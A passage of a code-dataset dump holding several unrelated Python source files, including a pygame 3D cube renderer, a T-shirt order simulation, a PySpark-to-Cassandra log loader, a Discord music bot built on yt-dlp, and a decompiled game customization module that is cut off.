0.01 if stop_clip else 0\n\n def set_tile(self, pos, tile):\n if tile and tile.TICKER:\n self.ticker_tiles[pos] = tile\n elif pos in self.tilemap: # Check the old tile\n old_tile = self.tilemap[pos]\n if old_tile and old_tile.TICKER:\n del self.ticker_tiles[pos]\n self.tilemap[pos] = tile\n\n def tick(self):\n self.monsters()\n to_delete = []\n for entity in self.entities:\n if entity.enabled:\n entity.tick()\n if entity.destroyed:\n to_delete.append(entity)\n for entity in to_delete:\n self.entities.remove(entity)\n for pos, tile in list(self.ticker_tiles.items()):\n tile.tick(pos, self)\n\n def monsters(self):\n if self.monster_cooldown.expired():\n self.monster_cooldown.start(\n (60 + (random() - 0.5) * 30) * self.monster_time_scale\n )\n monster_num = ceil(self.age.time() / (60 * 10) * random())\n for i in range(monster_num):\n player = [\n entity\n for entity in self.entities\n if isinstance(entity, Player)\n ]\n if player:\n x_pos = choice(player).x + choice([-30, 30])\n self.spawn(choice([Zombie]), x_pos)\n\n def collides(self, pos):\n x, y = pos\n return self.get_tile((round(x), round(y)))\n\n def entities_at(self, pos):\n return [\n entity\n for entity in self.entities\n if entity.collides(pos)\n ]\n\n def is_full(self, pos):\n return self.collides(pos) or len(self.entities_at(pos))\n","repo_name":"budopod1/backend-a3","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11068019303","text":"import pygame\nimport pandas as pd\nimport numpy as np\npygame.init()\n\n#screen demensions\nscreen_width = 1200\nscreen_height = 600\n\n#colors\nbak_color = (76, 217, 191)\nyellow = (255, 255, 0)\nblue = (87, 233, 248)\ngreen = (30, 180, 30)\nred = (200,0,0)\nblack = (0,0,0)\n\n#shapes\ndef stationary_cube(xyz, whl):\n cube = [[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0]]\n x1 = xyz[0] - whl[0]/2\n x2 = xyz[0] + whl[0]/2\n y1 = xyz[1] - whl[1]/2\n y2 = xyz[1] + whl[1]/2\n z1 = xyz[2] - whl[2]/2\n z2 = xyz[2] + whl[2]/2\n top = list(range(4))\n bot = list(range(4,8))\n side1 = top[0:2] + [bot[1], bot[0]]\n side2 = top[1:3] + [bot[2], bot[1]]\n side3 = top[2:4] + [bot[3], bot[2]]\n side4 = [top[0], top[3], bot[3], bot[0]]\n \n for i in top:\n cube[i][1] = y1\n for i in bot:\n cube[i][1] = y2\n for i in side1:\n cube[i][0] = x1\n for i in side3:\n cube[i][0] = x2\n for i in side2:\n cube[i][2] = z1\n for i in side4:\n cube[i][2] = z2\n\n side_groups = top, bot, side1, side2, side3, side4\n\n return cube, side_groups #,tops, bots, sides1, sides2, sides3, sides4\n\n#functions\ndef ang_dist(x1, y1, x2, y2, ang):\n distx = x2 - x1\n disty = y2 - y1\n dist = (distx**2 + disty**2)**0.5\n\n if distx > 0:\n cube_ang = np.arcsin(disty/dist)\n else:\n if disty > 0:\n cube_ang = np.pi - np.arcsin(disty/dist)\n else:\n cube_ang = -np.pi/2 -(np.pi/2 + np.arcsin(disty/dist))\n\n if ang <= 0:\n ang = 2*np.pi - np.absolute(ang)%(2*np.pi)\n elif ang >= 2*np.pi:\n ang = 2*np.pi - ang%(2*np.pi)\n\n dif_ang = cube_ang - ang\n\n if dif_ang < -np.pi:\n dif_ang = 2*np.pi + dif_ang\n elif dif_ang > np.pi:\n dif_ang = dif_ang - 2*np.pi\n \n return dist, cube_ang, dif_ang\n\ndef da_to_xy(dif_ang_x, dif_ang_y, view_width, view_height):\n corners = []\n #find position x\n ang_ratio = dif_ang_x/(view_width/2)\n \n ang_ratioy = dif_ang_y/(view_height/2)\n x = screen_width/2 - ang_ratio*screen_width/2\n y = screen_height/2 - ang_ratioy*screen_height/2\n\n return (x,y)\n \n\n#classes\nclass cube:\n whl = (100, 200, 300)\n xyz = [200, whl[1]/2, 600]\n ang_xzr = (0, 0, 0)\n colors = (red, blue, green, blue, green, red)\n\n def draw(self, cam_xyz, cam_angs_xy, view_angs):\n #find corner points IN:(whl, xyz, ang_xzr), OUT:(corners_xyz, side_groups)\n corners_xyz, side_groups = stationary_cube(self.xyz, self.whl)\n\n #sort into polys IN:(corners_xyz, side_groups) OUT:(poly_xyz, side_num)\n poly_xy = []\n poly_ad = []\n side_num = list(range(len(side_groups)))\n for i in side_groups:\n poly_xy.append([])\n poly_ad.append(0)\n count = 0\n for n in i:\n count += 1\n #find dist and ang IN:(poly_xyz) OUT:(poly_da)\n dist_xz, cube_ang_x, dif_ang_x = ang_dist(cam_xyz[0], cam_xyz[2], corners_xyz[n][0], corners_xyz[n][2], cam_angs_xy[0])\n dist, cube_ang, dif_ang = ang_dist(0, cam_xyz[1], dist_xz, corners_xyz[n][1], cam_angs_xy[1])\n\n #convert 3d to 2d IN:(poly_da) OUT:(poly_xy)\n xy = da_to_xy(dif_ang, dif_ang_x, view_angs[0], view_angs[1])\n\n #add the distances\n poly_ad[-1] += dist\n\n #append\n poly_xy[-1].append(xy)\n \n #average the distances\n poly_ad[-1] = poly_ad[-1]/count\n\n #sort cubes by dist large to small IN:(poly_xy, poly_ad, side_num) OUT:(flat_cube, cube_avg_dist, side_num)\n sorted_ad = sorted(poly_ad)\n flat_cube = []\n avg_dist = sum(poly_ad)/len(poly_ad)\n\n count = 0\n while sum(poly_ad) != 0:\n for i in range(len(poly_ad)):\n if poly_ad[i] == sorted_ad[count]:\n flat_cube.append(poly_xy[i])\n side_num[count] = i\n poly_ad[i] = 0\n count += 1\n \n return flat_cube, avg_dist, side_num\n\n#scene facts\n#camera atributes\ncamera_xyz = [200,100,100]\ncamera_angs_xy = [0,0]\ncam_speed = 20\ncamera_view_angles = [np.pi/3, np.pi/3]\n\n\n#create objects\npolygons = []\ndistances = []\nside_numbers = []\ncubes = []\nfor i in range(2):\n cubes.append(cube())\n\n#create display\npygame.display.set_caption('cubes')\ndisplay = pygame.display.set_mode((screen_width, screen_height))\n\n#main\nrun = True\nwhile run:\n #delay and screen reset\n pygame.time.delay(60)\n display.fill(bak_color)\n\n #find polygon info\n for i in range(len(cubes)):\n polys_xy, avg_dist, side_nums = cubes[i].draw(camera_xyz, camera_angs_xy, camera_view_angles)\n polygons.append(polys_xy)\n distances.append(avg_dist)\n side_numbers.append(side_nums)\n \n #sort polygons by distance\n sorted_dist = sorted(distances)\n polys = []\n side_ident = []\n count = 0\n while sum(distances) != 0:\n for i in range(len(distances)):\n if distances[i] == sorted_dist[count]:\n polys.append(polygons[i])\n side_ident.append(side_numbers[i])\n distances[i] = 0\n count += 1\n\n #draw polygons\n for i in range(len(polygons)):\n for n in range(len(polygons[i])):\n #color = cubes[i].colors[side_ident[i][n]]\n pygame.draw.polygon(display, blue, polys[i][n])\n \n #get key press inputs\n keys = pygame.key.get_pressed()\n\n #mouse movement\n mouse = pygame.mouse.get_pos()\n mouse_dif = (mouse[0]-screen_width/2, mouse[1]-screen_height/2)\n\n camera_angs_xy[0] -= mouse_dif[0]/(screen_width*3)\n\n #walk around\n if keys[pygame.K_w]:\n camera_xyz[0] += np.cos(camera_angs_xy[0])*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0])*cam_speed\n elif keys[pygame.K_s]:\n camera_xyz[0] += np.cos(camera_angs_xy[0]+np.pi)*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0]+np.pi)*cam_speed\n if keys[pygame.K_a]:\n camera_xyz[0] += np.cos(camera_angs_xy[0]+np.pi/2)*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0]+np.pi/2)*cam_speed\n elif keys[pygame.K_d]:\n camera_xyz[0] += np.cos(camera_angs_xy[0]-np.pi/2)*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0]-np.pi/2)*cam_speed\n\n #update screen\n pygame.display.update()\n\n #quite properly\n for event in pygame.event.get() : \n if event.type == pygame.QUIT :\n pygame.quit() \n run = False","repo_name":"wrafaelharr/Python_projects","sub_path":"3D environment/perspective_cube_v5.py","file_name":"perspective_cube_v5.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23760448053","text":"import csv\n\nfileName = \"demo.csv\"\nREAD = \"r\"\n\nwith open(fileName, READ) as myCsvFile :\n #Read the file content\n dataFromFile = csv.reader(myCsvFile)\n for dataRow in dataFromFile :\n print(', '.join(dataRow))\n for singleRow in dataRow :\n print(singleRow)","repo_name":"okhachiai/Personal_Labs","sub_path":"PythonLab/LearnPython/readFromCsvFile.py","file_name":"readFromCsvFile.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14077376175","text":"#! /usr/bin/env python3\n\n\nimport argparse\nimport collections\nimport datetime\nimport pickle\nimport warnings\n\nimport numpy as np\nimport openpyxl\n\nORDER_SIZE = 35\nPSEUDOCOUNT = 35\n\nSIM_SIZE = 10_000\n\n# openpyxl does not support data validation, which does not affect the work\n# here\nwarnings.simplefilter('ignore', UserWarning)\n\n# Initialize NumPy random number generator\ngen = np.random.default_rng(seed=42)\n\nparser = argparse.ArgumentParser(\n description='Compute an optimal T-shirt order.')\nparser.add_argument('inventory_filename',\n help='filename of Excel spreadsheet with inventory')\nparser.add_argument('-m', '--method',\n choices=['worst_case', 'industry', 'heuristic', 'optimized'],\n default='heuristic',\n help='how to compute the optimal order')\nparser.add_argument('-o', '--output',\n choices=['console', 'hypothetical', 'final'], default='console',\n help='where to write down the optimal order')\nargs = parser.parse_args()\n\n# Grab counts of lifetime T-shirts received and lifetime T-shirts queued from\n# the inventory spreadsheet\nwb = openpyxl.load_workbook(filename=args.inventory_filename, data_only=True)\nassert wb['inventory']['A2'].value == 'Lifetime received'\nassert wb['inventory']['A3'].value == 'Lifetime queued'\n\nlifetime_received = collections.OrderedDict()\nlifetime_queued = collections.OrderedDict()\nlogical_inventory = collections.OrderedDict() # Negatives denote backorders\ngendered_sizes = []\n\nfor column in wb['inventory'].iter_cols():\n header_val = column[0].value\n if header_val is not None and header_val != 'totals':\n lifetime_received[header_val] = column[1].value\n lifetime_queued[header_val] = column[2].value\n logical_inventory[header_val] = column[6].value\n gendered_sizes.append(header_val)\nwb.close()\n\n# We define a weakly informative Dirichlet prior from industry knowledge:\nindustry_knowledge = {'XS': 0.01,\n 'S': 0.07,\n 'M': 0.28,\n 'L': 0.30,\n 'XL': 0.20,\n '2XL': 0.12,\n '3XL': 0.02}\n\n# A bit of tidying to deal with the real world: the vendor does not sell\n# women's XS or 3XL shirts. There are a couple reasonable, arbitrary ways to\n# deal with this in conjunction with a 50:50 prior distribution of men vs\n# women. One would be to allocate the other sizes evenly between men and women,\n# allocating all 1% of XS and all 2% of 3XL to men. Another would be to\n# re-normalize the distribution of women's shirts, such that (e.g.) 0.07 / (1 -\n# 0.01 - 0.02) of women's shirts are size WS. Note these are very close.\n#\n# Doing the first thing, which makes the prior histogram 51.5% men and 48.5%\n# women:\nprior_size_hist = collections.OrderedDict()\nfor gendered_size in gendered_sizes:\n size = gendered_size[1:]\n if f'M{size}' in lifetime_received and \\\n f'W{size}' in lifetime_received:\n prior_size_hist[gendered_size] = industry_knowledge[size] / 2.0\n else:\n prior_size_hist[gendered_size] = industry_knowledge[size]\n\nalpha_prior = np.array([1.0 + PSEUDOCOUNT * val\n for val in prior_size_hist.values()])\n\nprior_samples = gen.dirichlet(alpha_prior, size=SIM_SIZE)\n\n# Diagnostic for choosing a reasonable pseudocount for the prior: How many MXS\n# shirts were ordered? 1% of 35 shirts is 0.35 shirts on average. Ordering more\n# than 3 of these, a priori, should happen pretty seldom.\n#\n# mxs_probs = prior_samples[:, 0]\n# more_than_three = sum(gen.binomial(ORDER_SIZE, prob) > 3 for prob in mxs_probs)\n# print(more_than_three / SIM_SIZE)\n#\n# Some prior predictive simulation results:\n# PSEUDOCOUNT = 0 => 32% of orders have >3 MXS shirts\n# PSEUDOCOUNT = 20 => 9.2% of orders have >3 MXS shirts\n# PSEUDOCOUNT = 35 => 5.0% of orders have >3 MXS shirts\n# PSEUDOCOUNT = 50 => 3.3% of orders have >3 MXS shirts\n#\n# From this, PSEUDOCOUNT = 35 seems pretty reasonable: flexible enough to allow\n# for startlingly lopsided orders, but not flexible enough that they happen all\n# the time.\n\n# Construct posterior from lifetime queued\ncounts = np.array(list(lifetime_queued.values()))\nalpha_posterior = alpha_prior + counts\n\n# Now sample distributions from the posterior:\nposterior_samples = gen.dirichlet(alpha_posterior, size=SIM_SIZE)\n\n# At most we'd need to simulate logical_inventory + ORDER_SIZE samples from\n# each draw of the Dirichlet distribution (i.e., one could never do better than\n# perfect efficiency where you fill existing backorders, then use every single\n# T-shirt already in stock and every T-shirt in the order we're planning here,\n# getting to a completely empty inventory before the following re-order).\ninv_arr = np.array(list(logical_inventory.values()))\n\n# Build the library of order streams.\nstream_length = sum(inv_arr) + ORDER_SIZE\norder_streams = np.zeros((posterior_samples.shape[0], stream_length),\n dtype='int')\nfor i in range(order_streams.shape[0]):\n order_streams[i, :] = gen.choice(inv_arr.shape[0],\n size=stream_length,\n p=posterior_samples[i])\n\n# Hack: dump order streams to disk and that's it.\nwith open('order_streams.pkl', 'wb') as pf:\n pickle.dump(order_streams, pf)\n","repo_name":"ramanshahdatascience/tshirts","sub_path":"2023-02-23-talk/time_to_order_histograms/build_order.py","file_name":"build_order.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37059420761","text":"from humps import camelize\nfrom pydantic import BaseModel, Field\n\nfrom app.types import ULID\n\n\nclass APIModel(BaseModel):\n class Config:\n orm_mode = True\n alias_generator = camelize\n allow_population_by_field_name = True\n\n\nclass AbstractBaseModel(APIModel):\n id: ULID = Field(...)\n\n\nclass AbstractParentResourceModel(AbstractBaseModel):\n file_id: str = Field(..., title=\"SHA256\", alias=\"sha256\")\n\n\nclass AbstractResourceModel(APIModel):\n id: str = Field(..., title=\"ID\", description=\"A SHA256 hash of the content\")\n content: str = Field(...)\n","repo_name":"ninoseki/uzen","sub_path":"app/schemas/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"40"} +{"seq_id":"28802261326","text":"from objs.microService import MicroService\n\n\nclass Gcp_general_jobs(MicroService):\n def __init__(self, service_name, namespace):\n super().__init__(service_name, namespace)\n self.replicaCount = None if namespace == \"prod\" else 1\n\n def set_resources(self):\n self.namespace == \"prod\" or self.resources.update({\n \"requests\": {\n \"cpu\": \"1000m\",\n \"memory\": \"1000Mi\",\n },\n \"limits\": {\n \"cpu\": \"1000m\",\n \"memory\": \"1000Mi\",\n }\n })\n\n def set_envs(self):\n self.env.update({\n \"SPRING_PROFILES_ACTIVE\": \"prod\" if \"prod\" == self.namespace else \"test\",\n \"JVM_HEAP_MIN\": \"350M\" if \"prod\" == self.namespace else \"150M\",\n \"JVM_HEAP_MAX\": \"700M\" if \"prod\" == self.namespace else \"300M\",\n })\n\n # Overriding the default method\n def populate_ingress(self, sub_domain):\n hosts = [f'{self.serviceName}{\"-dev\" if self.namespace != \"prod\" else \"\"}.{domain}' for domain in self.domains]\n hosts.extend([f'{self.serviceName}.{sub_domain}.{domain}' for domain in self.domains])\n tls = [{'secreteName': self.tlsSecrets[self.extract_domain(host)], 'hosts': [host]} for host in\n list(filter(lambda host: \"k8s\" not in host, hosts))]\n\n return {'hosts': hosts, 'tls': tls}\n","repo_name":"EranM6/umbrella-server","sub_path":"apps/gcp-general-jobs.py","file_name":"gcp-general-jobs.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37575704390","text":"from pyspark.sql import SparkSession, types\nfrom cassandra.cluster import Cluster\nimport sys, re, uuid\n\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\ndef parse_line(input):\n line_re = re.compile(r'^(\\S+) - - \\[(\\S+) [+-]\\d+\\] \\\"[A-Z]+ (\\S+) HTTP/\\d\\.\\d\\\" \\d+ (\\d+)$')\n line = line_re.split(input)\n if len(line) > 4:\n host = line[1]\n path = line[3]\n bytes = int(line[4])\n id = str(uuid.uuid4())\n return host, path, bytes, id\n\ndef main(input, output_kys, nasalogs):\n\n data = sc.textFile(input).repartition(100)\n re_data = data.map(parse_line).filter(lambda x: x is not None) #filter out the None tuples\n nasa_schema = types.StructType([\n types.StructField('host', types.StringType()),\n types.StructField('path', types.StringType()),\n types.StructField('bytes', types.IntegerType()),\n types.StructField('id', types.StringType())\n ])\n df = spark.createDataFrame(re_data, schema = nasa_schema)\n df.show(5)\n df.write.format(\"org.apache.spark.sql.cassandra\").mode('overwrite').option('confirm.truncate','true') \\\n .options(table = nasalogs, keyspace = output_kys).save()\n\nif __name__ == \"__main__\":\n cluster_seeds = ['node1.local', 'node2.local']\n spark = SparkSession.builder.appName('load logs spark') \\\n .config('spark.cassandra.connection.host',','.join(cluster_seeds)).getOrCreate()\n assert spark.version >= '3.0' # make sure we have Spark 3.0+\n spark.sparkContext.setLogLevel('WARN')\n sc = spark.sparkContext\n\n input = sys.argv[1]\n output_kys = sys.argv[2]\n table = sys.argv[3]\n main(input, output_kys, table)\n \n\n","repo_name":"xxxibdara/Big_Data_Works_732","sub_path":"A8/load_logs_spark.py","file_name":"load_logs_spark.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14754594368","text":"import subprocess\nfrom typing import Any, Dict, Optional\nfrom discord.opus import Encoder\nimport io\nimport shlex\nimport asyncio\nfrom src.res.errors.bad_link import BadLink\nimport discord\nimport yt_dlp as youtube_dl\nfrom requests import get\n\nfrom ..interfaces.imusicdata import IMusicData\n\nyoutube_dl.utils.bug_reports_message = lambda: \"\"\n\nytdl_format_options = {\n \"format\": \"bestaudio/best\",\n \"outtmpl\": \"%(extractor)s-%(id)s-%(title)s.%(ext)s\",\n \"restrictfilenames\": True,\n \"noplaylist\": False,\n \"extract_flat\": True,\n \"nocheckcertificate\": True,\n \"ignoreerrors\": True,\n \"logtostderr\": False,\n \"quiet\": True,\n \"no_warnings\": True,\n \"default_search\": \"auto\",\n \"source_address\": \"0.0.0.0\",\n}\n\nffmpeg_options: Dict[str, Any] = {\n \"options\": \"-vn\",\n \"before_options\": \"-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5\",\n}\n\nytdl = youtube_dl.YoutubeDL(ytdl_format_options)\n\n\nclass YoutubeDLSource(discord.PCMVolumeTransformer):\n def __init__(self, source, *, data, volume=0.3):\n super().__init__(source, volume)\n\n self.data = data\n\n self.title = data.get(\"title\")\n self.url = data.get(\"url\")\n\n @classmethod\n async def from_music_data(\n cls,\n musicdata: IMusicData,\n *,\n loop: Optional[asyncio.AbstractEventLoop] = None,\n volume=0.3,\n ):\n _loop: asyncio.AbstractEventLoop = loop or asyncio.get_event_loop()\n data: Any | dict[str, Any] = await _loop.run_in_executor(\n None,\n lambda: ytdl.extract_info(musicdata.get_url(), download=False),\n )\n if data is None:\n raise BadLink(musicdata.get_url())\n if \"entries\" in data:\n data = data[\"entries\"][0]\n filename = (\n data[\"url\"] if \"url\" in data else ytdl.prepare_filename(data)\n )\n return cls(\n discord.FFmpegPCMAudio(filename, **ffmpeg_options),\n data=data,\n volume=volume,\n )\n\n\ndef search(arg):\n with ytdl:\n try:\n get(arg)\n except Exception:\n video = ytdl.extract_info(f\"ytsearch:{arg}\", download=False)\n if video is None:\n raise Exception(\"Não foi possível encontrar nenhum vídeo.\")\n if \"entries\" in video:\n video = video[\"entries\"][0]\n else:\n video = ytdl.extract_info(arg, download=False)\n\n return video\n\n\nclass YTMusicData(IMusicData):\n def __init__(self, title: str, url: str):\n self._title: str = title\n self._url: str = url\n\n @classmethod\n def from_url(cls, url: str) -> list[\"YTMusicData\"]:\n print(url)\n result = search(url)\n if result is None:\n raise BadLink(url)\n if \"entries\" in result:\n return [\n cls(video[\"title\"], video[\"url\"])\n for video in result[\"entries\"]\n ]\n video = result\n if \"original_url\" in video.keys():\n return [cls(video[\"title\"], video[\"original_url\"])]\n else:\n return [cls(video[\"title\"], video[\"url\"])]\n\n def get_title(self) -> str:\n return self._title\n\n def get_url(self) -> str:\n return self._url\n\n def get_artist(self) -> str:\n return \"Unknown\"\n\n async def get_source(self) -> YoutubeDLSource:\n return await YoutubeDLSource.from_music_data(self) # type: ignore\n\n\nclass FFmpegPCMAudio(discord.AudioSource):\n def __init__(\n self,\n source,\n *,\n executable=\"ffmpeg\",\n pipe=False,\n stderr=None,\n before_options=None,\n options=None,\n ):\n stdin = None if not pipe else source\n args = [executable]\n if isinstance(before_options, str):\n args.extend(shlex.split(before_options))\n args.append(\"-i\")\n args.append(\"-\" if pipe else source)\n args.extend(\n (\"-f\", \"s16le\", \"-ar\", \"48000\", \"-ac\", \"2\", \"-loglevel\", \"warning\")\n )\n if isinstance(options, str):\n args.extend(shlex.split(options))\n args.append(\"pipe:1\")\n self._process = None\n try:\n self._process = subprocess.Popen(\n args,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=stderr,\n )\n self._stdout = io.BytesIO(\n self._process.communicate(input=stdin)[0]\n )\n except FileNotFoundError:\n raise discord.ClientException(\n executable + \" was not found.\"\n ) from None\n except subprocess.SubprocessError as exc:\n raise discord.ClientException(\n \"Popen failed: {0.__class__.__name__}: {0}\".format(exc)\n ) from exc\n\n def read(self):\n ret = self._stdout.read(Encoder.FRAME_SIZE)\n if len(ret) != Encoder.FRAME_SIZE:\n return b\"\"\n return ret\n\n def cleanup(self):\n proc = self._process\n if proc is None:\n return\n proc.kill()\n if proc.poll() is None:\n proc.communicate()\n\n self._process = None\n","repo_name":"TheSmileyDroid/harpi","sub_path":"src/res/utils/ytmusicdata.py","file_name":"ytmusicdata.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1158250297","text":"# 2015.11.18 11:52:16 Støední Evropa (bìžný èas)\n# Embedded file name: scripts/client/gui/customization_2_0/data_aggregator.py\nimport copy\nfrom Event import Event\nfrom gui import GUI_SETTINGS\nfrom gui.game_control import getIGRCtrl\nfrom helpers.i18n import makeString as _ms\nfrom gui.shared import g_itemsCache as _g_itemsCache\nfrom gui.shared.ItemsCache import CACHE_SYNC_REASON, g_itemsCache\nfrom items.vehicles import g_cache as _g_vehiclesCache\nfrom items.qualifiers import g_cache as _g_qualifiersCache\nfrom CurrentVehicle import g_currentVehicle as _g_currentVehicle, g_currentVehicle\nfrom elements import AvailableCamouflage, AvailableInscription, AvailableEmblem, InstalledCamouflage, InstalledInscription, InstalledEmblem, Qualifier, CamouflageQualifier\n\nclass CUSTOMIZATION_TYPE:\n CAMOUFLAGE = 0\n EMBLEM = 1\n INSCRIPTION = 2\n\n\nSLOT_TYPE = {CUSTOMIZATION_TYPE.EMBLEM: 'player',\n CUSTOMIZATION_TYPE.INSCRIPTION: 'inscription'}\n_TYPE_NAME = {'emblems': CUSTOMIZATION_TYPE.EMBLEM,\n 'inscriptions': CUSTOMIZATION_TYPE.INSCRIPTION,\n 'camouflages': CUSTOMIZATION_TYPE.CAMOUFLAGE}\n_ITEM_CLASS = {CUSTOMIZATION_TYPE.EMBLEM: AvailableEmblem,\n CUSTOMIZATION_TYPE.INSCRIPTION: AvailableInscription,\n CUSTOMIZATION_TYPE.CAMOUFLAGE: AvailableCamouflage}\n_MAX_HULL_SLOTS = 2\n_MAX_TURRET_SLOTS = 2\nVEHICLE_CHANGED_EVENT = 'VEHICLE_CHANGED_EVENT'\n\nclass DataAggregator(object):\n\n def __init__(self):\n self.updated = Event()\n self.viewModel = []\n self.__installed = ()\n self.__availableItems = None\n self.__displayedItems = None\n self.__igrReplacedItems = None\n self.__notMigratedItems = None\n self.__itemGroups = None\n self.__initialViewModel = ()\n self.__cNationID = None\n self.__rawItems = None\n self.__vehicleInventoryID = None\n self.__displayIgrItems = getIGRCtrl().getRoomType() == 2 and GUI_SETTINGS.igrEnabled\n self.__availableGroupNames = None\n self.__gatherDataForVehicle(CACHE_SYNC_REASON.DOSSIER_RESYNC, None)\n _g_currentVehicle.onChanged += self.__onCurrentVehicleChanged\n _g_itemsCache.onSyncCompleted += self.__gatherDataForVehicle\n return\n\n def fini(self):\n _g_currentVehicle.onChanged -= self.__gatherDataForVehicle\n _g_currentVehicle.onChanged -= self.__onCurrentVehicleChanged\n self.__rawItems = None\n self.__installed = None\n self.__availableItems = None\n self.__notMigratedItems = None\n self.__displayedItems = None\n self.__initialViewModel = None\n self.__availableGroupNames = None\n self.__igrReplacedItems = None\n self.__itemGroups = None\n self.viewModel = None\n return\n\n @property\n def installed(self):\n return self.__installed\n\n @property\n def available(self):\n return self.__availableItems\n\n @property\n def displayed(self):\n return self.__displayedItems\n\n @property\n def initialViewModel(self):\n return self.__initialViewModel\n\n @property\n def availableGroupNames(self):\n return self.__availableGroupNames\n\n def __onCurrentVehicleChanged(self):\n if self.__vehicleInventoryID != g_currentVehicle.item.invID:\n self.__gatherDataForVehicle(VEHICLE_CHANGED_EVENT, None)\n return\n\n def __gatherDataForVehicle(self, updateReason, invalidItems):\n if updateReason in (CACHE_SYNC_REASON.DOSSIER_RESYNC, CACHE_SYNC_REASON.SHOP_RESYNC, VEHICLE_CHANGED_EVENT):\n self.__vehicleInventoryID = g_currentVehicle.item.invID\n curVehItem = _g_currentVehicle.item\n curVehDescr = curVehItem.descriptor\n self.__cNationID = curVehDescr.type.customizationNationID\n inDossier = (_g_itemsCache.items.getVehicleDossier(curVehItem.intCD).getBlock('camouflages'), _g_itemsCache.items.getVehicleDossier(curVehItem.intCD).getBlock('emblems'), _g_itemsCache.items.getVehicleDossier(curVehItem.intCD).getBlock('inscriptions'))\n self.__rawItems = [_g_vehiclesCache.customization(self.__cNationID)['camouflages'], _g_vehiclesCache.playerEmblems()[1], _g_vehiclesCache.customization(self.__cNationID)['inscriptions']]\n self.__itemGroups = (_g_vehiclesCache.customization(self.__cNationID)['camouflageGroups'], _g_vehiclesCache.playerEmblems()[0], _g_vehiclesCache.customization(self.__cNationID)['inscriptionGroups'])\n self.__availableGroupNames = []\n self.__displayedItems = [{}, {}, {}]\n self.__availableItems = [{}, {}, {}]\n self.__igrReplacedItems = [{}, {}, {}]\n self.__notMigratedItems = [set([]), set([]), set([])]\n inventoryItems = self.__setInventoryItems()\n installedRawItems = self.__setInstalledRawItems(curVehDescr)\n self.__installed = self.__setInstalledCustomization(curVehDescr.hull['emblemSlots'], curVehDescr.turret['emblemSlots'], installedRawItems)\n for cType in [CUSTOMIZATION_TYPE.CAMOUFLAGE, CUSTOMIZATION_TYPE.EMBLEM, CUSTOMIZATION_TYPE.INSCRIPTION]:\n self.__fillAvailableItems(cType, inDossier)\n self.__fillDisplayedItems(cType, inventoryItems)\n self.__fillDisplayedGroups(cType, inDossier, inventoryItems)\n\n self.updated(updateReason == VEHICLE_CHANGED_EVENT)\n\n def __setInstalledCustomization(self, vehicleHullSlots, vehicleTurretSlots, installedRawItems):\n installedHullEmblems = []\n installedTurretEmblems = []\n installedHullInscriptions = []\n installedTurretInscriptions = []\n hullEmblemSlotIdx = 0\n hullInscriptionSlotIdx = 0\n turretEmblemSlotIdx = 0\n turretInscriptionSlotIdx = 0\n for slot in vehicleHullSlots:\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.EMBLEM]:\n installedHullEmblems.append(installedRawItems['emblems'][hullEmblemSlotIdx])\n hullEmblemSlotIdx += 1\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.INSCRIPTION]:\n installedHullInscriptions.append(installedRawItems['inscriptions'][hullInscriptionSlotIdx])\n hullInscriptionSlotIdx += 1\n\n for slot in vehicleTurretSlots:\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.EMBLEM]:\n installedTurretEmblems.append(installedRawItems['emblems'][_MAX_HULL_SLOTS + turretEmblemSlotIdx])\n turretEmblemSlotIdx += 1\n if slot.type == SLOT_TYPE[CUSTOMIZATION_TYPE.INSCRIPTION]:\n installedTurretInscriptions.append(installedRawItems['inscriptions'][_MAX_HULL_SLOTS + turretInscriptionSlotIdx])\n turretInscriptionSlotIdx += 1\n\n return ([ InstalledCamouflage(ic, 0) for ic in installedRawItems['camouflages'] ], [ InstalledEmblem(ihe, 0) for ihe in installedHullEmblems ] + [ InstalledEmblem(ite, 2) for ite in installedTurretEmblems ], [ InstalledInscription(ihi, 0) for ihi in installedHullInscriptions ] + [ InstalledInscription(iti, 2) for iti in installedTurretInscriptions ])\n\n def __setInstalledRawItems(self, curVehDescr):\n installedRawItems = {'camouflages': list(curVehDescr.camouflages),\n 'emblems': list(curVehDescr.playerEmblems),\n 'inscriptions': list(curVehDescr.playerInscriptions)}\n for key in installedRawItems.keys():\n for installedRawItem in installedRawItems[key]:\n installedItemID = installedRawItem[0]\n if installedRawItem[2] == 0 and installedItemID is not None and (_TYPE_NAME[key] != CUSTOMIZATION_TYPE.EMBLEM or _TYPE_NAME[key] == CUSTOMIZATION_TYPE.EMBLEM) and installedItemID not in self.__itemGroups[CUSTOMIZATION_TYPE.EMBLEM]['auto'][0]:\n self.__notMigratedItems[_TYPE_NAME[key]].add(installedItemID)\n\n if self.__displayIgrItems:\n igrLayout = g_itemsCache.items.inventory.getIgrCustomizationsLayout()\n vehicleId = g_currentVehicle.item.invID\n igrRoomType = 